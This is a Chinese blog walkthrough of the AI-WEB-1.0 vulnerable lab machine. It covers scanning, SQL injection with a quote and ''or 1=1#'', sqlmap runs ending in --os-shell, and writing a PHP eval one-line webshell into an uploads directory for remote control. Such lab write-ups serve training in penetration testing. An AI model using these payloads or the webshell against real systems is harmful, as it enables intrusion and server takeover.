首页 > 其他分享 >AI-WEB-1.0详细教程

AI-WEB-1.0详细教程

时间:2024-07-29 20:58:04浏览次数:10  
标签:WEB www 1.0 AI html uploads home se3reTdir777 页面

目录

一、主机发现

二、漏洞发现

三、漏洞利用


一、主机发现

启动靶机

虚拟机为NAT模式,我们根据真实机VMnet8的IP将虚拟机的IP扫描出来。

可以看到页面什么都没有。所以我们需要进一步扫描。

扫描目录,index是我们刚刚访问的界面。双击打开robots.txt。

有新发现的目录,我们挨个访问一下看看。

发现只有se3reTdir777能够访问。

二、漏洞发现

看到是查询页面,考虑sql注入。先输入一下 ' 发现报错。

再输入

'or 1=1#

初步判断有SQL注入漏洞,我们用bp抓下包,然后用sqlmap跑一下。

全选复制抓包内容到文本,使用如下命令跑一下:

python sqlmap.py -r C:\Users\sya\Desktop\6.txt –batch

出现此页面,确实存在sql注入

我们接下来的思路是写入木马,但是需要一个可写入路径需要我们找一下。

上面我们扫到的目录有好几个不能访问,我们需要深入对他们扫描一下。

发现了新大陆,我们双击打开看一下是phpinfo。

三、漏洞利用

Ctrl+f 搜索一下/m3diNf0/,发现了路径:/home/www/html/web1x443290o2sdf92213/

我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

先用如下命令获取交互式的系统命令执行环境。

python sqlmap.py -r C:\Users\sya\Desktop\6.txt --os-shell

现在我们就可以通过上传一句话木马了。

echo '<?php @eval($_POST['cmd']);?>' > 2.php

蚁剑连接

注:蚁剑连接为连接php可显示页面

这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下

但是不能网页直接访问

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

这里很多人被误导导致无法连接

正常路径在

http://192.168.222.132/se3reTdir777/uploads/2.php

连接成功

标签:WEB,www,1.0,AI,html,uploads,home,se3reTdir777,页面
From: https://blog.csdn.net/2301_76631050/article/details/140780947

相关文章

  • Javaweb项目|停车场微信小程序的设计与实现+ssm【源码+论文+PPT+部署视频】
    我们提供多元化的技术项目服务,涵盖Java、PHP、Python等编程语言,以及前端开发、人工智能、大数据、单片机开发、ASP.NET、物联网等领域。我们还提供简历模板、面试题库和学习资料,帮助用户提升技术能力和就业竞争力。我们的服务内容包括:免费功能设计、任务书和开题报告撰写、......
  • Javaweb项目|springboot大学生就业招聘系统的设计与实现
    收藏点赞不迷路 关注作者有好处文末获取源码一、系统展示二、万字文档展示 基于springboot大学生就业招聘系统的设计与实现开发语言:Java数据库:MySQL技术:Spring+SpringMVC+MyBatis+Vue工具:IDEA/Ecilpse、Navicat、Maven 编号:springboot047一、系统展示二、万......
  • 【Azure APIM】调用APIM的备份接口时候遇见Authentication Failed错误
    问题描述在之前博文中介绍使用SystemManagedIdentity执行APIM备份到StorageAccount的操作时,突然遇见了AuthenticationFailed,详细的错误信息显示证书过期。{"error":{"code":"BadRequest","message":"AuthenticationFailed:Aconfigur......
  • Wordle For Linux 1.0
    把本世纪最伟大的发明移植到LinuxClicktoDownloadWordleForWindows1.2.0使用方法请先解压到/home文件夹下(其他地方也可以,但是你在运行之前必须要先跳到那个文件夹下)然后打开终端,输入以下命令:g++WordleForLinux.cpp-owordle即为编译完成,此后你无需再进行编译,只......
  • web基础以及http协议
    ⼀、web基本概念和常识Web:为⽤户提供的⼀种在互联⽹上浏览信息的服务,Web服务是动态的、可交互的、跨平台的和图形化的。Web服务为⽤户提供各种互联⽹服务,这些服务包括信息浏览服务,以及各种交互式服务,包括聊天、购物、学习等等内容。Web应⽤开发也经过了⼏代技术的不断......
  • Springboot使用Thumbnailator压缩图片上传到阿里云OSS
    原文链接:https://blog.csdn.net/weixin_39973810/article/details/86545054前提:图片的压缩大致有两种,一种是将图片的尺寸压缩小,另一种是尺寸不变,将压缩质量,一般对于项目我们需要第一种,即用户上传一张分辨率为3840 × 2160的图片,通过上传图片接口后上传到OSS上的图片分辨率会......
  • DataFunTalk | AI Agent 在 1688 电商平台中的应用
    本文来源公众号“DataFunTalk”,仅用于学术分享,侵权删,干货满满。原文链接:AIAgent在1688电商平台中的应用导读 本文将分享AIAgent在电商平台中的探索。本文整理自2024年4月19日DataFunCon2024(上海站)(线下)王卓隽老师关于《AIAgent在1688电商平台中的应用》的......
  • 产品经理必备的18个AI工具链接完整整理
    作为产品经理,日常工作中使用AI工具助手可以极大提升工作效率和质量。以下是对您提到的18个AI工具助手的使用场景、特性和区别的详细介绍:ChatGPT:一个基于GPT模型的对话AI,擅长生成自然语言文本,可用于快速获取信息、撰写文案或进行头脑风暴。https://chatgpt.com/Perplexity......
  • 产品经理用AI,跟普通人有什么不同?
    最近跟一个产品经理朋友聊天,他们公司最近单独拉一个只有产品经理的team,要在接下来半年把过去几年火过的产品工具,“加上AI驱动”重新做一遍。美其名曰“抓住AI浪潮的红利”。这不是今天的重点,重点是他在高频的用AI设计产品一段时间后,对“使用AI”这件事有了全新的......
  • 基于javaweb的家乡旅游网站的设计与实现
    摘 要随着社会经济的持续发展和人民生活水平的提高,旅游已经成为人们生活中不可或缺的重要组成部分。同时,互联网的普及,让人们对于旅游信息的获取逐渐转移到线上平台。基于javaweb的家乡旅游网站作为一个便捷的家乡旅游资讯信息的平台,为用户提供了实时且全面的家乡旅游信息,包......